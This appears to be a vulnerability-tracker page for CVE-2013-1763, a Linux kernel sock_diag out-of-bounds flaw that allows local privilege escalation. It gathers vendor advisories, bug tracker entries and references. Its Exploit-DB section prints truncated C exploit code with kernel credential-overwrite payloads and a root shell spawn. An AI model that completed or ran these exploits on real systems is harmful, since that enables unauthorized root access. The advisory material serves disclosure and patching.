CVE-2013-1763
published 2013-02-28CVE-2013-1763: Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c in the Linux kernel before 3.7.10 allows local users to gain privileges via a…
PriorityP338high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
4.18%
89.7th percentile
Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c in the Linux kernel before 3.7.10 allows local users to gain privileges via a large family value in a Netlink message.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | linux | — | — |
| linux | linux_kernel | >= 0 < 3.11.0-12.19 | 3.11.0-12.19 |
| linux | linux_kernel | >= 0 < 4.2.0-16.19 | 4.2.0-16.19 |
| linux | linux_kernel | >= 3.3 < 3.4.34 | 3.4.34 |
| linux | linux_kernel | >= 3.5 < 3.7.10 | 3.7.10 |
| linux | linux_kernel | >= 3.8 < 3.8.1 | 3.8.1 |
CVSS provenance
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
osv7.2HIGH
vendor_debian7.2LOW
vendor_redhat7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-xmh4-cqm8-6p2v: Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag
ghsa_unreviewed·2022-05-17
CVE-2013-1763 [HIGH] CWE-20 GHSA-xmh4-cqm8-6p2v: Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag
Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c in the Linux kernel before 3.7.10 allows local users to gain privileges via a large family value in a Netlink message.
OSV
CVE-2013-1763: Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag
osv·2013-02-23·CVSS 7.2
CVE-2013-1763 [HIGH] CVE-2013-1763: Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag
Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c in the Linux kernel before 3.7.10 allows local users to gain privileges via a large family value in a Netlink message.
Ubuntu
Linux kernel (OMAP4) vulnerability
vendor_ubuntu·2013-02-27
CVE-2013-1763 Linux kernel (OMAP4) vulnerability
Title: Linux kernel (OMAP4) vulnerability
Summary: The system could be made to crash or run programs as an administrator.
Mathias Krause discovered a bounds checking error for netlink messages
requesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could exploit
this flaw to crash the system or run programs as an administrator.
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
Ubuntu
Linux kernel (Quantal HWE) vulnerability
vendor_ubuntu·2013-02-26
CVE-2013-1763 Linux kernel (Quantal HWE) vulnerability
Title: Linux kernel (Quantal HWE) vulnerability
Summary: The system could be made to crash or run programs as an administrator.
Mathias Krause discovered a bounds checking error for netlink messages
requesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could exploit
this flaw to crash the system or run programs as an administrator.
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2013-02-26
CVE-2013-1763 Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: The system could be made to crash or run programs as an administrator.
Mathias Krause discovered a bounds checking error for netlink messages
requesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could exploit
this flaw to crash the system or run programs as an administrator.
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
Red Hat
kernel: sock_diag: out-of-bounds access to sock_diag_handlers[]
vendor_redhat·2013-02-24·CVSS 7.2
CVE-2013-1763 [HIGH] CWE-129 kernel: sock_diag: out-of-bounds access to sock_diag_handlers[]
kernel: sock_diag: out-of-bounds access to sock_diag_handlers[]
Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c in the Linux kernel before 3.7.10 allows local users to gain privileges via a large family value in a Netlink message.
Statement: This issue did not affect the versions of the kernel package as shipped with Red Hat Enterprise Linux 5 and 6.
This issue was addressed in Red Hat Enterprise MRG 2 via RHSA-2013:0622 https://rhn.redhat.com/errata/RHSA-2013-0622.html
Package: kernel (Red Hat Enterprise Linux 5) - Not affected
Package: kernel (Red Hat Enterprise Linux 6) - Not affected
Debian
CVE-2013-1763: linux - Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c in...
vendor_debian·2013·CVSS 7.2
CVE-2013-1763 [HIGH] CVE-2013-1763: linux - Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c in...
Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c in the Linux kernel before 3.7.10 allows local users to gain privileges via a large family value in a Netlink message.
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
No detection rules found.
Exploit-DB
Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation
exploitdb·2015-08-26·CVSS 7.2
CVE-2013-1763 [HIGH] Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation
Linux Kernel
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
//#include
//#include
//#include
#include "sock_diag.h"
#include "unix_diag.h"
#include "netlink.h"
unsigned long user_cs;
unsigned long user_ss;
unsigned long user_rflags;
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;
static void saveme() {
asm(
"movq %%cs, %0\n"
"movq %%ss, %1\n"
"pushfq\n"
"popq %2\n"
: "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory" );
}
void shell(void) {
if(!getuid())
system("/bin/sh");
exit(0);
}
Exploit-DB
Linux Kernel 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Local Privilege Escalation (2)
exploitdb·2013-03-13
CVE-2013-1763 Linux Kernel 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Local Privilege Escalation (2)
Linux Kernel 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Local Privilege Escalation (2)
---
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;
int __attribute__((regparm(3)))
x()
{
commit_creds(prepare_kernel_cred(0));
return -1;
}
char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
int main() {
int fd;
unsigned long mmap_start, mmap_size = 0x10000;
unsigned family;
struct {
struct nlmsghdr nlh;
struct
Exploit-DB
Linux Kernel 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Local Privilege Escalation (1)
exploitdb·2013-02-27
CVE-2013-1763 Linux Kernel 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Local Privilege Escalation (1)
Linux Kernel 3.3.x
#define JUMP 0x0000100000001000LL
#define BASE 0x380000000
#define SIZE 0x010000000
#define KSIZE 0x2000000
static long ugid;
void patch_current() {
int i,j,k;
char *current = *(char**)(((long)&i) & (-8192));
long kbase = ((long)current)>>36;
for (i=0; i>36) != kbase)) continue;
for (j=0; j<20; j++) {
for (k = 0; k < 8; k++)
if (((int*)&ugid)[k%2] != t[j+k]) goto next;
for (i = 0; i < 8; i++) t[j+i] = 0;
for (i = 0; i < 10; i++) t[j+9+i] = -1;
return;
next:; }
}
}
int main()
{
long u = getuid();
long g = getgid();
int i, f = socket(16,3,4);
static int n[10] = {40,0x10014,0,0,45,-1};
assert(mmap((void*)(1<<12), 1<<20, 3, 0x32, 0, 0)!=-1);
setresuid(u,u,u); setresgid(g,g,g);
ugid = (g<<32)|u;
memcpy(1<<12, &patch_current, 1024);
for (i = 0; i < (1<<17); i++) ((voi
Exploit-DB
Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Privilege Escalation (3)
exploitdb·2013-02-24·CVSS 7.2
CVE-2013-1763 [HIGH] Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Privilege Escalation (3)
Linux Kernel 3.3 hash.rehash_time, index 81
*
* Fedora 18 support added
*
* 2/2013
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;
int __attribute__((regparm(3)))
kernel_code()
{
commit_creds(prepare_kernel_cred(0));
return -1;
}
int jump_payload_not_used(void *skb, void *nlh)
{
asm volatile (
"mov $kernel_code, %eax\n"
"call *%eax\n"
);
}
unsigned long
get_symbol(char *name)
{
FILE *f;
unsigned long addr;
char dummy, sym
Bugzilla
CVE-2013-1763 kernel: sock_diag: out-of-bounds access to sock_diag_handlers[] [fedora-all]
bugzilla·2013-02-24·CVSS 7.2
CVE-2013-1763 [HIGH] CVE-2013-1763 kernel: sock_diag: out-of-bounds access to sock_diag_handlers[] [fedora-all]
CVE-2013-1763 kernel: sock_diag: out-of-bounds access to sock_diag_handlers[] [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please use the bodhi submission link
noted in the next comment(s). This will include the bug IDs of this
tracking bug as well as the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
Bodhi notes field when available.
Please note: t
Bugzilla
CVE-2013-1763 kernel: sock_diag: out-of-bounds access to sock_diag_handlers[]
bugzilla·2013-02-24·CVSS 7.2
CVE-2013-1763 [HIGH] CVE-2013-1763 kernel: sock_diag: out-of-bounds access to sock_diag_handlers[]
CVE-2013-1763 kernel: sock_diag: out-of-bounds access to sock_diag_handlers[]
Description:
An unprivileged user can send a netlink message resulting in an out-of-bounds access of the sock_diag_handlers[] array which, in turn, allows userland to take over control while in kernel mode.
References:
http://seclists.org/oss-sec/2013/q1/420
http://thread.gmane.org/gmane.linux.network/260061
Upstream fix:
http://thread.gmane.org/gmane.linux.network/260061
Discussion:
Created kernel tracking bugs for this issue
Affects: fedora-all [bug 915057]
---
Statement:
This issue did not affect the versions of the kernel package as shipped with Red Hat Enterprise Linux 5 and 6.
This issue was addressed in Red Hat Enterprise MRG 2 via RHSA-2013:0622 https://rhn.redhat.com/errata/RHSA-2013-0622.html
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=6e601a53566d84e1ffd25e7b6fe0b6894ffd79c0http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00004.htmlhttp://openwall.com/lists/oss-security/2013/02/25/12http://www.exploit-db.com/exploits/24555http://www.exploit-db.com/exploits/24746http://www.exploit-db.com/exploits/33336http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.7.10http://www.mandriva.com/security/advisories?name=MDVSA-2013:176http://www.openwall.com/lists/oss-security/2013/02/24/3http://www.ubuntu.com/usn/USN-1749-1http://www.ubuntu.com/usn/USN-1750-1http://www.ubuntu.com/usn/USN-1751-1https://bugzilla.redhat.com/show_bug.cgi?id=915052https://github.com/torvalds/linux/commit/6e601a53566d84e1ffd25e7b6fe0b6894ffd79c0http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=6e601a53566d84e1ffd25e7b6fe0b6894ffd79c0http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00004.htmlhttp://openwall.com/lists/oss-security/2013/02/25/12http://www.exploit-db.com/exploits/24555http://www.exploit-db.com/exploits/24746http://www.exploit-db.com/exploits/33336http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.7.10http://www.mandriva.com/security/advisories?name=MDVSA-2013:176http://www.openwall.com/lists/oss-security/2013/02/24/3http://www.ubuntu.com/usn/USN-1749-1http://www.ubuntu.com/usn/USN-1750-1http://www.ubuntu.com/usn/USN-1751-1https://bugzilla.redhat.com/show_bug.cgi?id=915052https://github.com/torvalds/linux/commit/6e601a53566d84e1ffd25e7b6fe0b6894ffd79c0
2013-02-28
Published